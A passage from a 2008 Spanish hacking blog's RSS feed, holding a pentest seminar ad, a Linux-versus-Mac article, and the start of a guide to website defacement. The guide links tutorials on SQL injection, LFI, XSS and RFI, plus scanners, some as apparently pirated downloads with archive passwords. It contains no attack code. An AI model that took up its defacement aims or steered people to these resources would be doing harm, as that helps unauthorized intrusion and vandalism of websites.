sistema.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-weight: 900; text-align: justify;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;&lt;strong&gt;6. Desarrollando Plan de Ingenieria Social.&lt;br /&gt;&lt;/strong&gt;&lt;/span&gt;&lt;span style=";font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;En esta parte usted podrá aprender como un hacker desarrolla un plan de ingeniería social y como lo ejecuta para poder hackiar una empresa.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-weight: 900;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;7&lt;/span&gt;&lt;span style="font-weight: 900; text-align: justify;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;&lt;strong&gt;. Desarrollo de Reconocimiento de una víctima.&lt;br /&gt;&lt;/strong&gt;&lt;/span&gt;&lt;span style=";font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;En esta parte usted podrá aprender como un hacker desarrolla un plan de investigación para poder entrar a una empresa o conseguir una persona. Antes de que un hacker empiece cualquier tipo de ataque debe conocer a quien se va a enfrentar.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-weight: 900;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;8&lt;/span&gt;&lt;span style="font-weight: 900; text-align: justify;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;&lt;strong&gt;. Rompiendo Password "Password Cracking".&lt;br /&gt;&lt;/strong&gt;&lt;/span&gt;&lt;span style=";font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;En esta parte usted podrá aprender como los hackers rompe los password más comunes de los sistemas.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-weight: 900;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;9. Escaneo y Penetración de Sistemas de Redes Wireless.&lt;br /&gt;&lt;/span&gt;&lt;span style=";font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;En esta parte el participante podrá aprender como los Hackers Escanea una Red Wireless y que herramientas utilizan para penetrar un sistema de redes.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-weight: 900;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;10. Manejo de Trojanos y Virus.&lt;br /&gt;&lt;/span&gt;&lt;span style=";font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;En esta parte usted podrá aprender como los hackers crean los virus y manejan los trojanos para infectar sistemas y entrar a los mismos.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-weight: 900;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;11. Ataques DoS "Denial Of Services"&lt;br /&gt;&lt;/span&gt;&lt;span style=";font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;En esta parte usted podrá aprender como los hackers desarrollan un ataque DoS para que los servidores colapsen mediante este tipo de ataque.&lt;/span&gt;&lt;/p&gt;&lt;div&gt;&lt;span style="font-weight: 900;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;12. Caso de Estudio Penetration Testing .&lt;br /&gt;&lt;/span&gt;&lt;span style=";font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;En esta parte usted podrá analizar un caso de estudio sobre un cliente que el Instructor especificará, en donde el instructor presentará en el mundo real como se harían estos tipos de negocios.&lt;/span&gt;&lt;/div&gt;&lt;span style=";font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;&lt;span style="font-weight: 900;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;&lt;div&gt;&lt;br /&gt;13. Aprenderá a como Generar Dinero en el mundo de la Seguridad / Hacking.&lt;br /&gt;En esta parte usted podrá aprender como ganar dinero legalmente ofreciendo sus servicios de penetration testing  y Ethical Hacker. &lt;p&gt;&lt;span style="font-weight: 900;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;14. Contrato Legal.&lt;br /&gt;&lt;/span&gt;&lt;span style="font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;"&gt;En esta parte se le entregará un contrato legal que usted podrá utilizar para ofrecer sus servicios de Penetration Testing.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-weight: 900;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;15. Incluye Libro de Penetration Testing.&lt;br /&gt;&lt;/span&gt;&lt;span style="font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;"&gt;A todos los participantes del Seminario se le entregará un libro de Penetration Testing, creado por el Autor del Libro "El Arte del Hacking", Juan Carlos Rodríguez.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;&lt;/span&gt;&lt;/span&gt;&lt;div&gt;&lt;span style="font-weight: 900;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;" &gt;Dirigido a:&lt;br /&gt;&lt;/span&gt;&lt;span style=";font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;1. A todas las personas que deseen aprender sobre el mundo de la Seguridad.&lt;br /&gt;2. A todas las personas que deseen convertirse en Hackers Eticos.&lt;br /&gt;3. A todas las personas que se estén preparando para certificaciones de redes y Ethical Hacking.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-weight: 900;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;" &gt;&lt;span style="font-size:130%;"&gt;[ Bono ]&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=";font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;1. Se entregará la lista de precios que usted puede cobrar por sus horas de servicio.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=";font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;2. Se entregará un contrato de servicios que usted podrá utilizar para formalizar sus servicios de Penetration Testing, con sus clientes.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=";font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;3. Se le explicará a usted como hacer negocios en el mundo de la seguridad&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-weight: 900;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;Fecha, horarios y Costos&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: normal;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: 700;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;Fecha&lt;/span&gt;&lt;span style="font-weight: normal;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;: Domingo 21 de Diciembre de 2008&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: 700;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;Horario&lt;/span&gt;&lt;span style="font-weight: normal;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;: 8:30 am a 4:30 pm *Puede extenderse.&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: 700;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;Lugar&lt;/span&gt;&lt;span style="font-weight: normal;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;: NETYK Center.&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: 700;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;Costo&lt;/span&gt;&lt;span style="font-weight: normal;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;: $95.00 (Separas con: $50.00)&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-weight: 900;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;El seminario incluye:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: normal;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;1. El Seminario incluye Certificado Premium.&lt;br /&gt;2. Libro de Texto que Explica Paso a Paso los temas del seminario.&lt;br /&gt;3. CD con los Software para practicar en su hogar.&lt;br /&gt;4. Incluye una Merienda durante el Seminario.&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: 900;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;&lt;br /&gt;Requisito:&lt;/span&gt;&lt;br /&gt;&lt;span style=";font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;Querer Aprender.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-weight: 900;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;Contacto con las oficinas de NETYK Center&lt;/span&gt;&lt;br /&gt;&lt;span style=";font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;787&lt;/span&gt;&lt;span style="font-weight: normal;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;-704-2277&lt;br /&gt;Horario: 10:00 am - 4:30 pm&lt;/span&gt; &lt;/p&gt;&lt;p&gt;&lt;span style="font-weight: 900;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;Para separar su espacio por Internet entre al siguiente enlace:&lt;br /&gt;&lt;a href="http://clicks.aweber.com/y/ct/?l=MuDGZ&amp;amp;m=1gJ0n2T6KgTZw1&amp;amp;b=bVOqUSv5dp3rrIFjWMFKrQ" target="_blank" title="blocked::http://clicks.aweber.com/y/ct/?l=MuDGZ&amp;amp;m=1gJ0n2T6KgTZw1&amp;amp;b=bVOqUSv5dp3rrIFjWMFKrQ"&gt;https://www.netyk.com/index.php?option=com_rsform&amp;amp;formId=9&amp;amp;Itemid=99999&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-3736081189219002617?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/iE-IAHJljfk" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2008-12-17T12:09:42.450-08:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://h4xxor.blogspot.com/2008/12/penetration-testing.html</feedburner:origLink></item><item><title>10 aspectos en los que Linux saca ventaja a Mac OS X</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/juXurOGgwgo/10-aspectos-en-los-que-linux-saca.html</link><category>Articulos</category><category>linux</category><category>mac</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Wed, 17 Dec 2008 08:47:09 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-2424388324834958563</guid><description>Lei Un Articulo Que Me Parecio Interesante En El Blog &lt;a href="http://webnoticiero.blogspot.com"&gt;Webnoticiero&lt;/a&gt; y lo cito a continuacion:&lt;br /&gt;&lt;br /&gt;"Siempre estamos hablando de Linux frente a Windows debido a que es el sistema operativo mayoritario, al menos por esta parte del mundo, pero no sólo se puede comparar frente al niño de la empresa de Bill Gates. Mac OS X es un sistema operativo muy cuidado estéticamente y muy sencillo de utilizar, pero, todo en la vida tiene “peros”, Linux se desenvuelve mejor que Mac OS X en 10 aspectos."&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;La primera de ellas es la flexibilidad. Con ello no queremos decir que OS X no sea un sistema operativo sencillo y configurable por el usuario. Sino más bien que OS X es más en el sentido Windows que Linux, es decir que tienes una opciones estipuladas y de ahí no te salgas, porque no hay más. Pongamos un ejemplo para ilustrar, en OS X puedes mover el Dock de sitio, hacerlo más grande, más pequeño, hasta hacer que se esconda de forma automática, incluso hay temas para el mismo. Pero de ahí no se puede pasar. Si por ejemplo quieres cambiar la barra de herramientas superior, es imposible. Con Linux puedes disponer del gestor de ventana que quieras y hay un nivel de personalización prácticamente inacabable.&lt;br /&gt;&lt;br /&gt;El siguiente aspecto a tener en cuenta es el código abierto. Uno de los grandes problemas para los usuarios de Linux es lo restrictivo de la licencia de OS X. Apple hizo uso de un kernel BSD para crear el kernel Darwin, que fue lanzado bajo licencia Apple Public Source License, aceptada por la FSS (Free Software Foundation), y posteriormente se unió todo el software propietario para crear OS X.&lt;br /&gt;&lt;br /&gt;El tercer puesto ha sido otorgado a la línea de comandos. Aunque muchos usuarios de OS X afirman que no hay necesidad alguna de usarla, muchos usuarios avanzados saben que la línea de comandos es crucial para importantes tareas administrativas. En este aspecto OS X fall en comparación con Linux, dado que prácticamente puede hacerse todo desde una consola de comandos de Linux. Con OS X disponen de varios comandos pero no es tan completa como la línea de comandos Linux.&lt;br /&gt;&lt;br /&gt;El siguiente punto es los requisitos de hardware, siendo de lejos Mac OS X mucho más exigente que Linux. Con ello no estamos comparando con la omnipresente Ubuntu, hay distribuciones de Linux mucho más ligeras que afirman funcionar sobre cualquier procesador y 256 megas de RAM. Pero comparando directamente los requisitos de Ubuntu con OS X:&lt;br /&gt;OS X: 876 MHz , 512 MB de RAM, 9 GB HDD&lt;br /&gt;Ubuntu: 700 MHz x86 , 384 MB de RAM, y 8 GB HDD&lt;br /&gt;&lt;br /&gt;La seguridad es otro punto a tener en cuenta y aquí tan sólo os podemos remitir al resultado de la &lt;a href="http://www.theinquirer.es/2008/03/30/ni_mac_ni_vista_solo_ubuntu_sigue_en_pie.html"&gt;competición “Pwn 2 Own”&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;El siguiente aspecto a tratar es la portabilidad, y con esto hablamos de la capacidad de migrar una propia instalación de una configuración de hardware a otra. Linux dispone de una gran adaptabilidad que le permite relocalizar y organizar el sistema al nuevo hardware. Con OS X estamos hablando de una instalación de 0.&lt;br /&gt;&lt;br /&gt;El caballero D. Dinero es el siguiente punto. El coste de OS X frente a Linux(0 €). Partiendo de que para disponer de OS X (legalmente) tienes que disponer de una máquina Apple, no sólo lo comparamos con los 129 $ que cuesta el sistema. El portátil más barato MacBook que se puede adquirir son 999 dólares. Se puede adquirir un portátil por menos de 400 euros y correr Linux perfectamente.&lt;br /&gt;&lt;br /&gt;Software disponible. Aunque a mucho les suene a sorpresa, hay mucho más software disponible para Linux que para OS X, tan sólo hya que realizar una búqueda en Google con OS X Software y Linux Software, los resultados son 19 millones y 45,7 millones aproximadamente. Además de ello es que en Linux hay una característica que le diferencia del resto de sistemas, hay muchas utilidades disponibles para realizar una tarea. Es decir, por ejemplo en Mac, tienes disponible Microsoft Office y OpenOffice como opciones mayoritarias, luego entramos en la categoría de menor nivel con Bean, Nisus, Mellel y NeoOffice. En Linux tenemos OpenOffice, y luego: Textmaker, Abiword, Hangul, EZ, Kwrite, gedit, nano, vi, emacs, Flwriter, Ted, Siag Office, LaTeX, EditPad Pro, y un largo etcétera. Además, es posible instalar aplicaciones de Linux en OS X gracias a Fink.&lt;br /&gt;&lt;br /&gt;El penúltimo aspecto en el que Linux es superior a OS X es que Mac OS X siempre muestra la misma apariencia y manejabilidad, da igual que seas un usuario novel, que uno avanzado. Y cuando llevas un tiempo con el sistema se nota. El sistema está realizado con la simplicidad en mente, y no siempre es bueno. En Linux puedes elegir entorno gráfico, gestor de ventanas o simplemente una consola de texto, así como cualquier mezcla de las opciones anteriores, lo que te da flexibilidad para el uso que necesites dar al ordenador en ese momento.&lt;br /&gt;&lt;br /&gt;Y el último punto es la eficiencia del teclado. Si vienes de un sistema Windows o Linux nada más entrar en contacto con un teclado Mac te das cuenta de que hay cosas que no funcionan como deberían. Ejemplos, la tecla Delete no funciona como es debido, para hacerla funcionar tienes que pulsar fn + Delete. Lo mismo pasa con la tecla Fin, para que funcione: Fn + Fin. Las combinaciones de teclas también son bastante extrañas en ocasiones, aunque al fin y al cabo cada sistema tiene las suyas. Otro problema es el ratón y sus botones. Sé que es fundamental en el diseño de Apple pero la mayoría de gente hace uso de los dos botones del ratón. Además en Linux puedes hacer uso de los 3 botones del ratón de serie. En mi caso particular tengo un ratón con 5 botones y dispongo de plena funcionalidad, incluyendo un copiar y pegar.&lt;br /&gt;&lt;br /&gt;Éstas son &lt;a href="http://blogs.techrepublic.com.com/10things/?p=461"&gt;10 puntos&lt;/a&gt; en los que Linux es superior a OS X. Serán más o menos rebatibles/discutibles, pero está claro que no son los únicos.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-2424388324834958563?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/juXurOGgwgo" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2008-12-17T08:47:09.941-08:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://h4xxor.blogspot.com/2008/12/10-aspectos-en-los-que-linux-saca.html</feedburner:origLink></item><item><title>Defacing De La Manera Correcta Desde 0 (Recopilacion)</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/smnqYYY02nM/defacing-de-la-manera-correcta-desde-0.html</link><category>Herramientas</category><category>manuales</category><category>Deface</category><category>Hacking</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Wed, 10 Dec 2008 17:05:46 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-852850933769655088</guid><description>&lt;div class="post" id="msg_584958"&gt;E visto que en muchos foros preguntan:&lt;br /&gt;&lt;br /&gt;quiero aprender a defecear por donde comienzo?&lt;br /&gt;a lo que usualmente le contestan&lt;br /&gt;aprende a usar SSS o acunetix,escanea la pagina,y busca su respectivo exploit en milw0rm y explotala,busca dorks en &lt;a href="http://www.google.com/" target="_blank"&gt;www.google.com&lt;/a&gt; etc etc&lt;br /&gt;&lt;br /&gt;pero realmente no se han detenido a pensar que realmente no aprenderia el usuario nada.ni siquiera de que y de donde viene una vulnerabilidad en una aplicacion web.&lt;br /&gt;&lt;br /&gt;y tampoco los encaminan a que aprendan programacion por que la mayoria de las veces las vulnerabilidades provienen o del administrador del server o del administrador de la web o del script web que este utilizando.&lt;br /&gt;&lt;br /&gt;o sea que en resumidas cuentas a la hora de que el usuario empiece a usar sus scanners y explotar con sus exploits de milw0rm no tiene la menor idea de por que vino la falla.&lt;br /&gt;&lt;br /&gt;"pero diran pero si yo quiero solamente es defecear la pagina"&lt;br /&gt;si es asi continua usando los scanners y explotando scripts prefabricados que salen vulnerables en milw0rm y no sigas leyendo.&lt;br /&gt;&lt;br /&gt;Aqui tambien encontraras todas las herramientas renombradas con sus respectivos enlaces de descarga que estan marcado de este &lt;a href="http://google.com/" target="_blank"&gt;color&lt;/a&gt; asi que pueden visitar los enlaces ;)&lt;br /&gt;&lt;br /&gt;&lt;ul style="margin-top: 0pt; margin-bottom: 0pt;"&gt;&lt;li type="square"&gt;&lt;b&gt;Por Que Este Paso A Paso?&lt;/b&gt;&lt;br /&gt;Ya eso lo conteste arriba creo :)&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;b&gt;Cual Es El Objetivo&lt;/b&gt;&lt;br /&gt;El Objetivo es que los usuarios,clarifiquen su camino y no se pierdan en lo que es el defacing,y que muestren interes en una rama del hacking interesante como lo es la Busqueda de vulnerabilidades a nivel web&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;b&gt;Que Aprendere?&lt;/b&gt;&lt;br /&gt;Lo mejor del under,que uno aprende hasta que tu mismo quieras si eres autodidacta y sabes dividir tu tiempo aprenderas todo&lt;br /&gt;&lt;br /&gt;A continuacion ire recopilando lo que si debes ocupar si quieres realmente convertirte en un "defacer" (si asi se le llama) xD&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;b&gt;Por Donde Empiezo&lt;/b&gt;&lt;br /&gt;ok por donde empieza la creacion de todo en el internet Programacion&lt;br /&gt;el internet se mueve gracias a cientos de lenguajes de programacion y por ahi debes comenzar:&lt;br /&gt;1-&lt;span style="color: red;"&gt;Html Al Menos Basico&lt;/span&gt;&lt;br /&gt;&lt;b&gt;    @&lt;/b&gt;html es un lenguaje de programacion por el cual estan programadas muchas paginas webs y seguramente sea el que quieras usar para poner tus index en tu camino hacia zone-h xD&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;a href="http://es.wikipedia.org/wiki/C%C3%B3digo_HTML" target="_blank"&gt;Html Info Wikipedia&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;a href="http://foro.el-hacker.com/index.php/topic,65267.0.html" target="_blank"&gt;Tuto Html by LogMare&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;a href="http://foro.el-hacker.com/index.php/topic,147909.0.html" target="_blank"&gt;HTML Y CSS&lt;/a&gt;&lt;br /&gt;******************&lt;br /&gt;2-&lt;span style="color: red;"&gt;PHP Intermedio&lt;/span&gt;&lt;br /&gt;&lt;b&gt;    @&lt;/b&gt;PhP Es Un lenguaje a nivel web similar al Html pero este tiene la ventaja que hace nuestros sitios dinamicos y realmente se pueden hacer cosas maravillosas con el...&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;a href="http://es.wikipedia.org/wiki/Php" target="_blank"&gt;PhP info Wikipedia&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;a href="http://foro.el-hacker.com/index.php/topic,108328.0.html" target="_blank"&gt;Manuales PhP&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;a href="http://www.desarrolloweb.com/php/" target="_blank"&gt;Recopilacion De PhP&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;a href="http://www.manualdephp.com/" target="_blank"&gt;Manual en linea PhP&lt;/a&gt;&lt;br /&gt;******************&lt;br /&gt;3-&lt;span style="color: red;"&gt;Sql&lt;/span&gt;&lt;br /&gt;&lt;b&gt;    @&lt;/b&gt;Bueno esto es un lenguaje que esta de una forma ligado a la programacion web y al defacing por que es un lenguaje del que se ocupa de gestionar base de datos de sitios webs y deferentes estructuras.&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;a href="http://es.wikipedia.org/wiki/Celda_activa" target="_blank"&gt;SqL Wikipedia Info&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;a href="http://foro.el-hacker.com/index.php/topic,137208.0.html" target="_blank"&gt;Diversos Libros y Manuales Sobre SQL&lt;/a&gt;&lt;br /&gt;*******************&lt;br /&gt;4-&lt;span style="color: red;"&gt;Perl&lt;/span&gt;&lt;br /&gt;&lt;b&gt;    @&lt;/b&gt;Perl es un lenguaje por excelencia limpio,organizado,y potente..por el cual es imprcindible ya que su potencia abarca en lo que respecta a la programacion de exploits crear tus propias tools e inclusive automatizar tus maldades&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;a href="http://es.wikipedia.org/wiki/Perl" target="_blank"&gt;Perl Wikipedia Info]&lt;/a&gt;&lt;br /&gt;[+&lt;a href="http://www.lawebdelprogramador.com/cursos/mostrar.php?id=70&amp;amp;texto=Perl" target="_blank"&gt;Recopilacion De Tutos De Perl&lt;/a&gt;&lt;br /&gt;#####################&lt;br /&gt;Bueno por ahora nos quedamos en esos lenguajes no es obligatorio pero es imprecindible a la hora que quieras avanzar y quieras solo descubrir fallos en sistemas u otras cosas (Pentester)&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;b&gt;Que Tecnicas Usare En el defacing?&lt;/b&gt;&lt;br /&gt;1-&lt;span style="color: red;"&gt;SqlInjection&lt;/span&gt;&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;a href="http://es.wikipedia.org/wiki/SQL_injection" target="_blank"&gt;Sql Injection Wikipedia Info&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;a href="http://www.milw0rm.com/papers/189" target="_blank"&gt;Error based SQL Injection by AnalyseR (ingles)&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;a href="http://www.milw0rm.com/papers/197" target="_blank"&gt;Blind MySQL Injection by ka0x&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;a href="http://www.milw0rm.com/papers/216" target="_blank"&gt;Técnicas de inyección en MySQL by ka0x&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;a href="http://www.enye-sec.org/textos/mysql.blind.sql.injection.txt" target="_blank"&gt;MYSQL BLIND SQL INJECTION by Pepelux&lt;/a&gt;&lt;br /&gt;***********************&lt;br /&gt;2-&lt;span style="color: red;"&gt;LFI(Local File Inclusion)&lt;/span&gt;&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;a href="http://www.milw0rm.com/papers/106" target="_blank"&gt;Remote / Local File Inclusion Exploits by Sunjester(inggles&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;a href="http://www.milw0rm.com/papers/229" target="_blank"&gt;f**king the Web Apps LfI BY josS&lt;/a&gt;&lt;br /&gt;***********************&lt;br /&gt;3-&lt;span style="color: red;"&gt;XSS(Cross Site Cripting)&lt;/span&gt;&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;a href="http://es.wikipedia.org/wiki/XSS" target="_blank"&gt;XSS Wikipedia Info&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;a href="http://www.milw0rm.com/papers/207" target="_blank"&gt;Cross Site Scripting [XSS] by sl4xUz&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;a href="http://ha.ckers.org/xss.html" target="_blank"&gt;XSS (Cross Site Scripting)Evasion De Filtros&lt;/a&gt;&lt;br /&gt;***********************&lt;br /&gt;4-&lt;span style="color: red;"&gt;RFI (Remote File Include)&lt;/span&gt;&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;a href="http://es.wikipedia.org/wiki/Remote_File_Inclusion_%28RFI%29" target="_blank"&gt;RfI Wikipedia Info]&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;a href="http://foro.el-hacker.com/index.php/topic,149052.0.html" target="_blank"&gt;RFI 101 Basico by blood_rec&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;a href="http://security-sh3ll.com/showthread.php?t=13611" target="_blank"&gt;R.F.I. Rooting (Linux Server and Safe Mod: OFF) by satanicstar (ingles)&lt;/a&gt;&lt;br /&gt;************************&lt;br /&gt;&lt;br /&gt;bueno eso son las tecnicas mas comunes por las cuales deberias empezar en esto del defacing....&lt;br /&gt;&lt;/li&gt;&lt;li type="square"&gt;&lt;b&gt;Que Herramientas Ocupo?&lt;/b&gt;&lt;br /&gt;&lt;b&gt;    @&lt;/b&gt;No Nesesitas Todas Estas Herramientas Que enlistare pero las Enlisto Para Que te hagas alguna idea de lo que podrias utilizar&lt;br /&gt;1-&lt;span style="color: yellow;"&gt;Mucha Paciencia y Cafe&lt;/span&gt;&lt;br /&gt;La Nesesitaras ya que esto no es entrar ver y defecear y ya..&lt;br /&gt;&lt;br /&gt;2-&lt;a href="http://www.cirt.net/nikto2" target="_blank"&gt;Nikto Scanner de Vulnerabilidades(linux)&lt;/a&gt;&lt;br /&gt;un scanner para la plataforma de linux con una buena base de datos de vulnerabilidades para aplicaciones webs&lt;br /&gt;&lt;br /&gt;3-&lt;a href="http://nmap.org/zenmap/" target="_blank"&gt;Zenmap Scanner de Puertos&lt;/a&gt;&lt;br /&gt;siempre un scanner de puertos es imprecindible a la hora de ver los puertos que tiene abierto la victima y este es muy bueno ya que te indica los servicios que gestiona cada puerto ;)&lt;br /&gt;4-&lt;a href="http://es.wikipedia.org/wiki/Netcat" target="_blank"&gt;NetCatHerramienta de Monitoreo de Red&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;5-&lt;a href="http://rapidshare.com/files/11564366/asss7101_HoCuS.rar" target="_blank"&gt;SSS Scanner de Vulnerabilidades (Windows)&lt;/a&gt;     ##pass:hackhell&lt;br /&gt;Shadow Security Scanner es un completísimo y efectivo escáner de vulnerabilidades para la plataforma de Windows nativa, aunque también examina servidores de cualquier otra plataforma revelando brechas en Unix, Linux, FreeBSD, OpenBSD y Net BSD.&lt;br /&gt;&lt;br /&gt;6-&lt;a href="http://rapidshare.com/files/147353399/Acunetix_Web_Vul_Scan_5.1_70829.rar" target="_blank"&gt;Acunetix Scanner De Vulnerabilidades (Windows)&lt;/a&gt;  ##pass:just4you&lt;br /&gt;Acunetix Web Vulnerability Scanner, una sencilla herramienta con la que podrás analizar todas las posibles entradas de hackers que pueden producirse en tu sitio web y así cerrarlas.&lt;br /&gt;&lt;br /&gt;7-&lt;a href="http://www.cygwin.com/setup.exe" target="_blank"&gt;Cygwin 